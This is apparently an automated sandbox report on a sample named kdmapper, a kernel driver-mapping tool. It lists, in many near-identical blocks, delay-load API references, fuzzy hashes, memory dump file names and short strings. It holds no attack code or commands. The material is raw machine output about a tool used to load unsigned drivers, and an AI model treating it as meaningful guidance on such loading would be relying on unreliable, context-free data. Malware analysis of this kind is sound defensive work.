                                                                                                                                                                          • Opcode Fuzzy Hash: ab499ef87bdad258fcd5305aa6ecffdf79a23f67b0cc521bfa178aa66063917d
                                                                                                                                                                          • Instruction Fuzzy Hash: F8B012E5259241FC318462455C06C37010FC4C0F21F30423EFC06C01C0E8516C4906B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: ac65bbd7ebb46c4e824bc50af48187ac5af051aa90f1217c8aa99a62ae486cbc
                                                                                                                                                                          • Instruction ID: 5d1d743991a05e32525594d2f08cc72a5a3a874e01580f7752932ba1f74cff2d
                                                                                                                                                                          • Opcode Fuzzy Hash: ac65bbd7ebb46c4e824bc50af48187ac5af051aa90f1217c8aa99a62ae486cbc
                                                                                                                                                                          • Instruction Fuzzy Hash: C1B012E5258201FC318461455C06C37010FC4C0F25F30423EFC06C01C0E8526D4506B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 29a3bb195f004ffcf4e9f7da28e05908962dd5e529226ebf9ab797f85665f85c
                                                                                                                                                                          • Instruction ID: ea3a061ba9102e19f388b9b382ce8857bc66b5ee819da776ce9f2dd3090bc3f4
                                                                                                                                                                          • Opcode Fuzzy Hash: 29a3bb195f004ffcf4e9f7da28e05908962dd5e529226ebf9ab797f85665f85c
                                                                                                                                                                          • Instruction Fuzzy Hash: 54B012E5258101EC314461451D06C37010FC4C0F25B30413EFC06C01C0EC526E0605B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: c1ffae8fa054ee0e579d62b87296adc7e71b05de10039d99a64c618af45494b7
                                                                                                                                                                          • Instruction ID: 30e53cb8693705d4997b6d90367f972b2a0220077be5bbda3d6a43275305ef4f
                                                                                                                                                                          • Opcode Fuzzy Hash: c1ffae8fa054ee0e579d62b87296adc7e71b05de10039d99a64c618af45494b7
                                                                                                                                                                          • Instruction Fuzzy Hash: 1AB012E5258101EC314461461C06C37010FC4C0F25B30413EFC06C01C0E8516D0505B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 8807feac78d3e9b87f16a18f604f23dfd3686d2970d4c5f000a8f545ec1469db
                                                                                                                                                                          • Instruction ID: 73aa6d38f5f97442ce35d68f4719333c894ce511ed96bc2540923faa97f04150
                                                                                                                                                                          • Opcode Fuzzy Hash: 8807feac78d3e9b87f16a18f604f23dfd3686d2970d4c5f000a8f545ec1469db
                                                                                                                                                                          • Instruction Fuzzy Hash: 5BB012D5358241FC318462455C06C37010FC4C0F21B30823EFC16C02C0E8516C4907B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 4073fd8a7c5bb226b33d8ed690da5be02f90f24f6f58b9250e918d88aed95dc0
                                                                                                                                                                          • Instruction ID: 6ba2ac94647500fa4f7c1591e5263d4aed7d90aee3e91633d9f24c72cb2f345b
                                                                                                                                                                          • Opcode Fuzzy Hash: 4073fd8a7c5bb226b33d8ed690da5be02f90f24f6f58b9250e918d88aed95dc0
                                                                                                                                                                          • Instruction Fuzzy Hash: 35B012D5258101EC314462451D06C37010FC4C0F21B30813EFC06C02C0EC626D0E06B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 884fa2ecc0824482ba13e2ceaa5902e846ae8df7bb1230dc547bbd74516f3197
                                                                                                                                                                          • Instruction ID: 3a347936c10df056b000594baf6a3c45ee2d449eb02a91f901698499d96bc5f4
                                                                                                                                                                          • Opcode Fuzzy Hash: 884fa2ecc0824482ba13e2ceaa5902e846ae8df7bb1230dc547bbd74516f3197
                                                                                                                                                                          • Instruction Fuzzy Hash: 5EB012E5258101FC314461451C06C37010FC4C1F25B30813EFC06C01C0E851AD0505B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: c
                                                                                                                                                                          • API String ID: 1269201914-1230825448
                                                                                                                                                                          • Opcode ID: 45c8a18711d4fe2756f3edc51c0b7fae2020d135c79f4aef54e9250500c8d747
                                                                                                                                                                          • Instruction ID: a6699ddb8ff39cf5bd59946ba2b3260d3ec87d803519eaf8d40b076547ed4fe5
                                                                                                                                                                          • Opcode Fuzzy Hash: 45c8a18711d4fe2756f3edc51c0b7fae2020d135c79f4aef54e9250500c8d747
                                                                                                                                                                          • Instruction Fuzzy Hash: 8FB012E5258101EC7144A1451E06C37018FC4C5F21F30413EFC06C01C0EC526D0605B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E51F
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: (c
                                                                                                                                                                          • API String ID: 1269201914-4066220940
                                                                                                                                                                          • Opcode ID: 6bf819ad1eb395b86b29c17ff2b2e6b6f59729d501e08984e9754ef602db7b7f
                                                                                                                                                                          • Instruction ID: 01649ba3a8753148f2684e4494ae8122ef075c45f4a46385a6e7e0002aac5119
                                                                                                                                                                          • Opcode Fuzzy Hash: 6bf819ad1eb395b86b29c17ff2b2e6b6f59729d501e08984e9754ef602db7b7f
                                                                                                                                                                          • Instruction Fuzzy Hash: 13B012C1658600BC324465489C03C3B051FC0C1F35B30432EF805C01C0E8430D8915B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E51F
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: (c
                                                                                                                                                                          • API String ID: 1269201914-4066220940
                                                                                                                                                                          • Opcode ID: 3f695cc7048e3753a37da146dcb562716a2eb1ce8310e7db7730a9f8a1c703e7
                                                                                                                                                                          • Instruction ID: 626938bb33b59a1a64719a7195d04d37804daa94a903cff4be8154653d7a72a5
                                                                                                                                                                          • Opcode Fuzzy Hash: 3f695cc7048e3753a37da146dcb562716a2eb1ce8310e7db7730a9f8a1c703e7
                                                                                                                                                                          • Instruction Fuzzy Hash: B7B012C1698540BC314465481D02C3B090FC0C1F35B30812EF805C42C0E8430D4605B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E51F
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: (c
                                                                                                                                                                          • API String ID: 1269201914-4066220940
                                                                                                                                                                          • Opcode ID: cf7dd0abe94d0760edb9dd8d434bbd84f35656aee370b2e8655870c767403abb
                                                                                                                                                                          • Instruction ID: baddbf857022221607e078ba9a4c7443890664a9dbe340e6b040d82e664961fe
                                                                                                                                                                          • Opcode Fuzzy Hash: cf7dd0abe94d0760edb9dd8d434bbd84f35656aee370b2e8655870c767403abb
                                                                                                                                                                          • Instruction Fuzzy Hash: 7EB012C1658500BC310429641C06C3B050FC0C1F35F30413EFC11C04C1A8420E4904B1
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E580
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: F0wnc
                                                                                                                                                                          • API String ID: 1269201914-3598844980
                                                                                                                                                                          • Opcode ID: a436558f56688620c455316ce5858e007f77b64a6436152578aa6b97ca2a71df
                                                                                                                                                                          • Instruction ID: 03daf4787642f97601a1c5089729cb26124c72c4570b366385b47a2c140a803b
                                                                                                                                                                          • Opcode Fuzzy Hash: a436558f56688620c455316ce5858e007f77b64a6436152578aa6b97ca2a71df
                                                                                                                                                                          • Instruction Fuzzy Hash: 82B012C1658110BC314461949D06C37016FC0C1F35B31832EF805C11C0EC430E0605B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E580
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: F0wnc
                                                                                                                                                                          • API String ID: 1269201914-3598844980
                                                                                                                                                                          • Opcode ID: 2908b604d89e5142a815c392eda4e88f548a71d53e21bd80f85b0123b7eaa814
                                                                                                                                                                          • Instruction ID: ed7dce5f8ffb96a6aeab3d6549d89d1dc61048ec500ecdeade0d42bb18e1abb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 2908b604d89e5142a815c392eda4e88f548a71d53e21bd80f85b0123b7eaa814
                                                                                                                                                                          • Instruction Fuzzy Hash: 14B012C1658210BC31846154DC07C37016FC0C1F35B31832EF805C11C0E8420D4506B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E580
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
                                                                                                                                                                          • Associated: 00000006.00000002.1366429596.0000000000620000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366482874.0000000000653000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.000000000065E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000665000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366506316.0000000000682000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 00000006.00000002.1366563841.0000000000683000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_6_2_620000_kdmapper.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                          • String ID: F0wnc
                                                                                                                                                                          • API String ID: 1269201914-3598844980
                                                                                                                                                                          • Opcode ID: ae383624e80c672eb345e42782d9e5c375c61af5cc072635f6718c950b7121cd
                                                                                                                                                                          • Instruction ID: 9d8e7583410c8c44a5e66571aa2db003284cba2d06d8cd14e4842da8daad5e7e
                                                                                                                                                                          • Opcode Fuzzy Hash: ae383624e80c672eb345e42782d9e5c375c61af5cc072635f6718c950b7121cd
                                                                                                                                                                          • Instruction Fuzzy Hash: 38B012C1698110BD314461541C06C37014FC0C1F35B31812EF805C11C0E8420D0505B5
                                                                                                                                                                          APIs
                                                                                                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 0063E1E3
                                                                                                                                                                            • Part of subcall function 0063E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0063E8D0
                                                                                                                                                                            • Part of subcall function 0063E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0063E8E1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000006.00000002.1366448870.0000000000621000.00000020.00000001.01000000.00000006.sdmp, Offset: 00620000, based on PE: true
